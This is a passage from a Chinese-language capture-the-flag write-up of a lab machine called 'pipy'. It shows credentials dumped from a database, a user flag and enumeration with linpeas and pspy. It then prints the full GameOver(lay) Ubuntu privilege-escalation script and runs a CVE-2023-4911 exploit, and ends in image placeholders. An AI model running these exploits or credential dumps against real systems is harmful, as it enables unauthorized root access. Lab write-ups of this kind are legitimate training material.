|\n| alea_futur | tinytext | YES | | NULL | |\n| prefs | text | YES | | NULL | |\n| cookie_oubli | tinytext | YES | | NULL | |\n| source | varchar(10) | NO | | spip | |\n| lang | varchar(10) | NO | | | |\n| imessage | varchar(3) | NO | | | |\n| backup_cles | mediumtext | NO | | '' | |\n+--------------+--------------+------+-----+---------------------+-------------------------------+\n23 rows in set (0.001 sec)\n\nMariaDB [spip]> select id_auteur,pass,htpass from spip_auteurs;\n+-----------+--------------------------------------------------------------+--------+\n| id_auteur | pass | htpass |\n+-----------+--------------------------------------------------------------+--------+\n| 1 | 4ng3l4 | |\n| 2 | $2y$10$UU8xkGHmmSzrF6elpQWjmeXooyfzHBLZPxxD4moW.oyCtSB.8i55e | |\n+-----------+--------------------------------------------------------------+--------+\n2 rows in set (0.000 sec)\n\nMariaDB [spip]> select nom,bio,email from spip_auteurs;\n+--------+-----+-----------------+\n| nom | bio | email |\n+--------+-----+-----------------+\n| Angela | | angela@pipy.htb |\n| admin | | admin@pipy.htb |\n+--------+-----+-----------------+\n2 rows in set (0.000 sec)<\/code><\/pre>\n\u5f97\u5230\u7528\u6237\u540d\u548c\u5bc6\u7801\uff1a<\/p>\n
Angela\n4ng3l4 <\/code><\/pre>\n\u5207\u6362Angela<\/h3>\nsu angela\n4ng3l4<\/code><\/pre>\n<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nangela@pipy:~$ sudo -l\n[sudo] password for angela: \nSorry, user angela may not run sudo on pipy.\nangela@pipy:~$ cat user.txt \ndab37650d43787424362d5805140538d\nangela@pipy:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nangela@pipy:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n......\u57fa\u672c\u90fd\u65e0\u6cd5\u5229\u7528\nangela@pipy:~$ find \/ -writable -type f 2>\/dev\/null\n......\u4e00\u65e0\u6240\u83b7<\/code><\/pre>\n\u4e0a\u4f20linpeas.sh<\/code>\u548cpspy64<\/code>\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\nangela@pipy:~$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/pipy\n(local) pwncat$ lcd ..\n(remote) angela@pipy:\/home\/angela$ cd \/tmp\n(remote) angela@pipy:\/tmp$ \n(local) pwncat$ upload linpeas.sh\n(local) pwncat$ upload pspy64\n(local) pwncat$\n(remote) angela@pipy:\/tmp$ ls\nlinpeas.sh pspy64\n(remote) angela@pipy:\/tmp$ chmod +x *\n(remote) angela@pipy:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u4e0apspy64<\/code>\u67e5\u770b\u4e00\u4e0b\uff0c\u7b49\u4e86\u534a\u5929\uff0c\u6bdb\u90fd\u6ca1\u53d1\u73b0\u3002\u3002\u3002<\/p>\n(remote) angela@pipy:\/tmp$ ss -tulnp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port\nudp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*\nudp UNCONN 0 0 172.20.10.4%enp0s3:68 0.0.0.0:*\ntcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*\ntcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*\ntcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*\ntcp LISTEN 0 1024 127.0.0.1:4226 0.0.0.0:*\ntcp LISTEN 0 511 *:80 *:*\ntcp LISTEN 0 128 [::]:22 [::]:*<\/code><\/pre>\n\u5185\u6838\u63d0\u6743<\/h3>\n
\u4f46\u662f\u6ca1\u6709\u53d1\u73b0\u5565\uff0c\u53ea\u80fd\u5c1d\u8bd5\u6211\u4eec\u6700\u4e0d\u60f3\u8fdb\u884c\u7684\u64cd\u4f5c\u4e86\uff0c\u5c1d\u8bd5\u5185\u6838\u662f\u5426\u6709\u95ee\u9898\u3002\u3002\u3002<\/p>\n
(remote) angela@pipy:\/tmp$ uname -a\nLinux pipy 5.15.0-84-generic #93-Ubuntu SMP Tue Sep 5 17:16:10 UTC 2023 x86_64 x86_64 x86_64 GNU\/Linux\n(remote) angela@pipy:\/tmp$ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription: Ubuntu 22.04.3 LTS\nRelease: 22.04\nCodename: jammy<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pipy]\n\u2514\u2500$ searchsploit ubuntu 22.04 \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n<\/div><\/p>\n<\/div><\/p>\n\u5148\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
#!\/bin\/bash\n\n# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation\n# by g1vi https:\/\/github.com\/g1vi\n# October 2023\n\necho "[+] You should be root now"\necho "[+] Type 'exit' to finish and leave the house cleaned"\n\nunshare -rm sh -c "mkdir l u w m && cp \/u*\/b*\/p*3 l\/;setcap cap_setuid+eip l\/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m\/*;" && u\/python3 -c 'import os;os.setuid(0);os.system("cp \/bin\/bash \/var\/tmp\/bash && chmod 4755 \/var\/tmp\/bash && \/var\/tmp\/bash -p && rm -rf l m u w \/var\/tmp\/bash")'<\/code><\/pre>\n\u53bb\u5e74\u5341\u6708\u4efd\u7684\uff0c\u4e5f\u53ef\u80fd\u662f\u8fd9\u4e2a\uff01\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
(remote) angela@pipy:\/tmp$ vim exploit.sh\n(remote) angela@pipy:\/tmp$ chmod +x exploit.sh \n(remote) angela@pipy:\/tmp$ .\/exploit.sh \n[+] You should be root now\n[+] Type 'exit' to finish and leave the house cleaned\nTraceback (most recent call last):\n File "<string>", line 1, in <module>\nPermissionError: [Errno 1] Operation not permitted\n(remote) angela@pipy:\/tmp$ ls -l exploit.sh \n-rwxrwxr-x 1 angela angela 558 Apr 10 05:56 exploit.sh<\/code><\/pre>\n\u597d\u50cf\u4e0d\u884c\u6b38\uff0c\u7ee7\u7eed\u770b\u770b\u522b\u7684\uff1a<\/p>\n
<\/div><\/p>\n\u7b2c\u56db\u4e2a\u4f3c\u4e4e\u66f4\u7b26\u5408\u6211\u4eec\u7684\u7cfb\u7edfglibc<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n(remote) angela@pipy:\/tmp$ \n(local) pwncat$ upload CVE-2023-4911-main.zip\n.\/CVE-2023-4911-main.zip \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 3.7\/3.7 KB \u2022 ? \u2022 0:00:00[02:04:18] uploaded 3.68KiB in 0.31 seconds upload.py:76\n(local) pwncat$ \n(remote) angela@pipy:\/tmp$ ls\nCVE-2023-4911-main.zip exploit.sh l linpeas.sh m pspy64 tmux-1000 u w\n(remote) angela@pipy:\/tmp$ unzip CVE-2023-4911-main.zip \nArchive: CVE-2023-4911-main.zip\n4ecc0713f7f12bc914d07c708ded10c17365ea79\n creating: CVE-2023-4911-main\/\n inflating: CVE-2023-4911-main\/Makefile \n inflating: CVE-2023-4911-main\/README.md \n inflating: CVE-2023-4911-main\/create-libc.py \n inflating: CVE-2023-4911-main\/gdb-script \n inflating: CVE-2023-4911-main\/xpl.c \n(remote) angela@pipy:\/tmp$ ls\nCVE-2023-4911-main CVE-2023-4911-main.zip exploit.sh l linpeas.sh m pspy64 tmux-1000 u w\n(remote) angela@pipy:\/tmp$ cd CVE-2023-4911-main\/\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls\ncreate-libc.py gdb-script Makefile README.md xpl.c\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ make\npython3 .\/create-libc.py\n[*] Checking for new versions of pwntools\n To disable this functionality, set the contents of \/home\/angela\/.cache\/.pwntools-cache-3.10\/update to 'never' (old way).\n Or add the following lines to ~\/.pwn.conf or ~\/.config\/pwn.conf (or \/etc\/pwn.conf system-wide):\n [update]\n interval=never\n[*] A newer version of pwntools is available on pypi (4.11.0 --> 4.12.0).\n Update with: $ pip install -U pwntools\ngcc xpl.c -o xpl\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls\n'"' create-libc.py gdb-script Makefile README.md xpl xpl.c\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls -l*\nls: invalid option -- '*'\nTry 'ls --help' for more information.\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls -l xpl\n-rwxrwxr-x 1 angela angela 16544 Apr 10 06:04 xpl\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ .\/xpl\n=============================\n[+] Exploit by DiegoAltF4 [+]\n=============================\n\nStarting bruteforce ...\n\n[0]\n[100]\n[200]\n[300]\n[400]\n[500]\n[600]\n[700]\n[800]\n[900]\n[1000]\n[1100]\n[1200]\n[1300]\n[1400]\n[1500]\n[1600]\n[1700]\n[1800]\n[1900]\n[2000]\n[2100]\n[2200]\n[2300]\n[2400]\n[2500]\n\nUsage:\n su [options] [-] [<user> [<argument>...]]\n\nChange the effective user ID and group ID to that of <user>.\nA mere - implies -l. If <user> is not given, root is assumed.\n\nOptions:\n -m, -p, --preserve-environment do not reset environment variables\n -w, --whitelist-environment <list> don't reset specified variables\n\n -g, --group <group> specify the primary group\n -G, --supp-group <group> specify a supplemental group\n\n -, -l, --login make the shell a login shell\n -c, --command <command> pass a single command to the shell with -c\n --session-command <command> pass a single command to the shell with -c\n and do not create a new session\n -f, --fast pass -f to the shell (for csh or tcsh)\n -s, --shell <shell> run <shell> if \/etc\/shells allows it\n -P, --pty create a new pseudo-terminal\n\n -h, --help display this help\n -V, --version display version\n\nFor more details see su(1).\n[2600]\n[2700]\n[2800]\n^C<\/code><\/pre>\n\u5bc4\u4e86\uff0c\u96be\u9053\u4e0d\u662f\u5185\u6838\u63d0\u6743\uff1f\u53bb\u7ffb\u4e86\u4e00\u4e0b\u522b\u7684\u5e08\u5085\u7684blog\u53d1\u73b0\u771f\u7684\u662f\u3002\u3002\u3002\u800c\u4e14\u8fd8\u662f\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4f46\u662f\u6211\u6ca1\u8dd1\u51fa\u6765\uff0c\u7ee7\u7eed\u627e\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240410120633650\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422018.png\")
<\/div>![\"image-20240410120719450\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422019.png\")
<\/div><\/p>\n![\"image-20240410120945440\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422020.png\")
<\/div><\/p>\n![\"image-20240410121133066\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422021.png\")
<\/div><\/p>\n![\"image-20240410122238643\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422022.png\")
<\/div><\/p>\n![\"image-20240410122501293\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422023.png\")
<\/div><\/p>\n![\"image-20240410123718448\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422024.png\")
<\/div><\/p>\n![\"image-20240410122554387\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422025.png\")
<\/div><\/p>\n![\"image-20240410122639687\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422026.png\")
<\/div><\/p>\n![\"image-20240410122737944\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422028.png\")
<\/div><\/p>\n![\"image-20240410122930574\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422029.png\")
<\/div><\/p>\n![\"image-20240410124842473\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422030.png\")
<\/div><\/p>\n![\"image-20240410132714848\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422031.png\")
<\/div><\/p>\n![\"image-20240410134128343\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422032.png\")
<\/div><\/p>\n![\"image-20240410135421222\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101354247.png\")
<\/div><\/p>\n![\"image-20240410135550203\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422033.png\")
<\/div><\/p>\n![\"image-20240410140023349\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422034.png\")
<\/div><\/p>\n![\"image-20240410141159008\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422035.png\")
<\/div><\/p>\n